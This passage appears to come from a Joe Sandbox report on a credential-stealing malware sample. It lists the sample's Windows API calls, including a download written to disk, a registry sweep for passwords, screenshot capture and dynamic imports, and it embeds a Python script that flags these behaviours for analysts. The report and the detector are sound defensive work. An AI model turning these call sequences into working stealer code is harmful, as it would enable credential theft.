                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                    • Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
                                                    • Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                    • Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0249EB35
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EB67
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EB73
                                                    • lstrcat.KERNEL32(?,004354E4), ref: 0249EB8A
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0249EBF3
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EC27
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EC33
                                                    • lstrcat.KERNEL32(?,00435504), ref: 0249EC4A
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0249ECB8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249ECE9
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249ECF5
                                                    • lstrcat.KERNEL32(?,00435518), ref: 0249ED0C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                    • Instruction ID: fb3f8baaa6f8b27468973f32f27e20519c49ebdf06d8a2e3fb5a776fdae2b2b4
                                                    • Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                    • Instruction Fuzzy Hash: A461E371614394BBD724FF70DC45FDE7BA5AF88700F00881EBA8996190EBB4D509CBA6
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00418263
                                                    • lstrlenA.KERNEL32(00000000), ref: 0041829C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 004182F0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418344
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418398
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
                                                    • lstrlenA.KERNEL32(00000000), ref: 004183E1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
                                                    • strtok_s.MSVCRT ref: 0041842A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen$strtok_s
                                                    • String ID:
                                                    • API String ID: 2211830134-0
                                                    • Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                    • Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
                                                    • Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                    • Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 024A44CB
                                                    • GetDesktopWindow.USER32 ref: 024A44D5
                                                    • GetWindowRect.USER32(00000000,?), ref: 024A44E3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 024A451A
                                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 024A459C
                                                    • GlobalLock.KERNEL32(?), ref: 024A45A7
                                                    • GlobalSize.KERNEL32(?), ref: 024A45B6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                    • String ID:
                                                    • API String ID: 1264946473-0
                                                    • Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                    • Instruction ID: d0866998523f89f3759b3b11a90aa1635d8f1d00066f226d3979a7b5c5cd9130
                                                    • Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                    • Instruction Fuzzy Hash: 6F51F7B1114344AFD710EF65DC88EAEBBEAAF88714F00491EF95593250DBB4E905CFA2
                                                    APIs
                                                    • lstrcat.KERNEL32(?,00638B0C), ref: 0249E394
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249E3BE
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E3F6
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E404
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E41F
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E433
                                                    • lstrcat.KERNEL32(?,00638A84), ref: 0249E447
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E45B
                                                    • lstrcat.KERNEL32(?,00638AC8), ref: 0249E46E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E4A6
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0249E4AD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                    • String ID:
                                                    • API String ID: 4230089145-0
                                                    • Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                    • Instruction ID: 8bff67d4ac5a50012e309b8b83085e701663b10fd8a02f7b6f6a00340f58dc74
                                                    • Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                    • Instruction Fuzzy Hash: 886191B191116CABCF15EF74CC44ADD7BB6AF48300F1049AAE949A3250DBB4AF85DF90
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
                                                    • StrCmpCA.SHLWAPI(?,00950150), ref: 00406A8A
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00406B50
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406B57
                                                    • InternetCloseHandle.WININET(?), ref: 00406B61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                    • String ID:
                                                    • API String ID: 2500263513-0
                                                    • Opcode ID: 19146b2a92cf3b66a6f48e2491a3ebf6e01c8e2ead9d210ebe94fa765b744fb1
                                                    • Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
                                                    • Opcode Fuzzy Hash: 19146b2a92cf3b66a6f48e2491a3ebf6e01c8e2ead9d210ebe94fa765b744fb1
                                                    • Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02486CA6
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02486CD3
                                                    • StrCmpCA.SHLWAPI(?,00638C80), ref: 02486CF1
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 02486D11
                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02486D2F
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02486D48
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02486D6D
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02486D97
                                                    • CloseHandle.KERNEL32(00000000), ref: 02486DB7
                                                    • InternetCloseHandle.WININET(00000000), ref: 02486DBE
                                                    • InternetCloseHandle.WININET(?), ref: 02486DC8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                    • String ID:
                                                    • API String ID: 2500263513-0
                                                    • Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                    • Instruction ID: 3fd7ad26b59e2605277a50fbf4ddcb4d008c92c33b0d72ca09fffef0f24dde8d
                                                    • Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                    • Instruction Fuzzy Hash: EA419FB1A10215AFDB60EF65DC49FEE77BAEF44705F004459FA05E7280EF70AA408BA4
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(0043573C,?,024979A8), ref: 024A4A6D
                                                    • GetProcAddress.KERNEL32(00000000,00435748), ref: 024A4A83
                                                    • GetProcAddress.KERNEL32(00000000,00435750), ref: 024A4A94
                                                    • GetProcAddress.KERNEL32(00000000,0043575C), ref: 024A4AA5
                                                    • GetProcAddress.KERNEL32(00000000,00435768), ref: 024A4AB6
                                                    • GetProcAddress.KERNEL32(00000000,00435770), ref: 024A4AC7
                                                    • GetProcAddress.KERNEL32(00000000,0043577C), ref: 024A4AD8
                                                    • GetProcAddress.KERNEL32(00000000,00435784), ref: 024A4AE9
                                                    • GetProcAddress.KERNEL32(00000000,0043578C), ref: 024A4AFA
                                                    • GetProcAddress.KERNEL32(00000000,0043579C), ref: 024A4B0B
                                                    • GetProcAddress.KERNEL32(00000000,004357A8), ref: 024A4B1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                    • Instruction ID: a5fe5a8fb7fc2cfe747b2122784778f2090948404f8b1c735f55ff6e419bd9f8
                                                    • Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                    • Instruction Fuzzy Hash: D5117875951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00418105
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
                                                    • StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
                                                    • strtok_s.MSVCRT ref: 0041820F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID: ;B$fplugins
                                                    • API String ID: 3280532728-1193078497
                                                    • Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                    • Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
                                                    • Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                    • Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94
                                                    APIs
                                                      • Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                      • Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                      • Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
                                                      • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                      • Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
                                                      • Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                      • Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
                                                      • Part of subcall function 00407710: strlen.MSVCRT ref: 00407840
                                                    • lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 004079FD
                                                    • lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 00407A30
                                                    • wsprintfA.USER32 ref: 00407A50
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00407A79
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
                                                    • lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                    • String ID: :
                                                    • API String ID: 2460923012-3653984579
                                                    • Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                    • Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
                                                    • Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                    • Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5
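The "APIs" lists above are what an analyst reads by hand to spot the stealer's building blocks: the WinINet fetch written straight to a new file (00406A3F and its unpacked twin at 02486CA6), the LoadLibraryA call followed by ten GetProcAddress resolutions (024A4A6D), the SHGetFolderPathA path build probed with GetFileAttributesA (0249E394), and the HKCU value enumeration searched for "Password" (subcall 00407710). The following is an added example, not part of the Joe Sandbox report or the sample: it parses those lists exactly as this report prints them and raises behaviour flags. The flag names and the thresholds (three or more GetProcAddress calls, and so on) are the author's own choices, and the sample input is copied from the lists on this page; the decoded constants (GENERIC_WRITE, CREATE_ALWAYS, KEY_READ, HKEY_CURRENT_USER, CSIDL_APPDATA) are the standard Windows SDK values.

```python
"""Parse Joe Sandbox 'APIs' lists and flag stealer behaviours from the call sequence."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One entry of a Joe Sandbox "APIs" list, in the three shapes this report prints:
#   • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
#   • strtok_s.MSVCRT ref: 00418105
#   • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: List[str]         # as printed: hex values, '?' for unknown, literal strings
    ref: int                # call-site address
    subcall: Optional[int]  # callee address for "Part of subcall function" entries

def parse_api_block(text: str) -> List[Call]:
    """Return the calls in document order; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls

def _u32(arg: str) -> Optional[int]:
    """Joe Sandbox prints negative values as '-xxxxxxxx' and unknown values as '?'."""
    try:
        return int(arg, 16) & 0xFFFFFFFF
    except ValueError:
        return None

HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
KEY_READ, GENERIC_WRITE, CREATE_ALWAYS = 0x20019, 0x40000000, 2

def flag_behaviours(calls: List[Call]) -> Dict[str, dict]:
    """Heuristic flags (author's own thresholds) over one function's call list."""
    names = [c.api for c in calls]
    first = lambda *apis: next((c for c in calls if c.api in apis), None)
    flags: Dict[str, dict] = {}
    # WinINet fetch written straight to disk (the helper at 00406A3F / 02486CA6).
    cf = first("CreateFileA", "CreateFileW")
    if first("InternetOpenUrlA", "InternetOpenUrlW") and "InternetReadFile" in names \
            and "WriteFile" in names and cf and len(cf.args) >= 5:
        flags["wininet_download_to_disk"] = {
            "generic_write": bool((_u32(cf.args[1]) or 0) & GENERIC_WRITE),
            "create_always": _u32(cf.args[4]) == CREATE_ALWAYS,
        }
    # Runtime import resolution: LoadLibrary followed by a burst of GetProcAddress (024A4A6D).
    if first("LoadLibraryA", "LoadLibraryW") and names.count("GetProcAddress") >= 3:
        flags["dynamic_api_resolution"] = {"getprocaddress_calls": names.count("GetProcAddress")}
    # Registry value sweep with a substring search over the data (subcall 00407710).
    reg, needle = first("RegOpenKeyExA", "RegOpenKeyExW"), first("StrStrA", "StrStrW")
    if reg and first("RegEnumValueA", "RegEnumValueW") and needle and len(needle.args) > 1:
        flags["registry_value_sweep"] = {
            "hive": HKEY.get(_u32(reg.args[0]), reg.args[0]),
            "key_read": _u32(reg.args[3]) == KEY_READ,
            "needle": needle.args[1],
        }
    # Path assembled under a known folder and probed for existence (0249E394).
    shp = first("SHGetFolderPathA", "SHGetFolderPathW")
    if shp and first("GetFileAttributesA", "GetFileAttributesW"):
        flags["known_folder_probe"] = {"folder": CSIDL.get(_u32(shp.args[1]), shp.args[1])}
    return flags

# Sample input copied from the "APIs" lists in this report (dumps 3_2_400000 and 3_2_2480000).
DOWNLOADER = """APIs
• InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
• CloseHandle.KERNEL32(00000000), ref: 00406B50
• InternetCloseHandle.WININET(00000000), ref: 00406B57
"""
LOADER = """• LoadLibraryA.KERNEL32(0043573C,?,024979A8), ref: 024A4A6D
• GetProcAddress.KERNEL32(00000000,00435748), ref: 024A4A83
• GetProcAddress.KERNEL32(00000000,00435750), ref: 024A4A94
• GetProcAddress.KERNEL32(00000000,0043575C), ref: 024A4AA5
"""
REGISTRY = """  • Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
  • Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
  • Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
  • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
• lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
• wsprintfA.USER32 ref: 00407A50
"""

if __name__ == "__main__":
    for name, block in (("downloader", DOWNLOADER), ("loader", LOADER), ("registry", REGISTRY)):
        print(name, flag_behaviours(parse_api_block(block)))
```

Paste any "APIs" list from the report into one of the string constants to run it over another function. The CreateFileA decode is the detail worth confirming by hand: dwDesiredAccess 0x40000000 is GENERIC_WRITE and dwCreationDisposition 2 is CREATE_ALWAYS, so the routine overwrites whatever path it is given, which together with the "Yara detected Powershell download and execute" signature marks this as the sample's downloader.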
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248BF76
                                                    • lstrlen.KERNEL32(00000000), ref: 0248BFA9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248BFD3
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248BFDB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C003
                                                    • lstrlen.KERNEL32(0043509C), ref: 0248C07A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
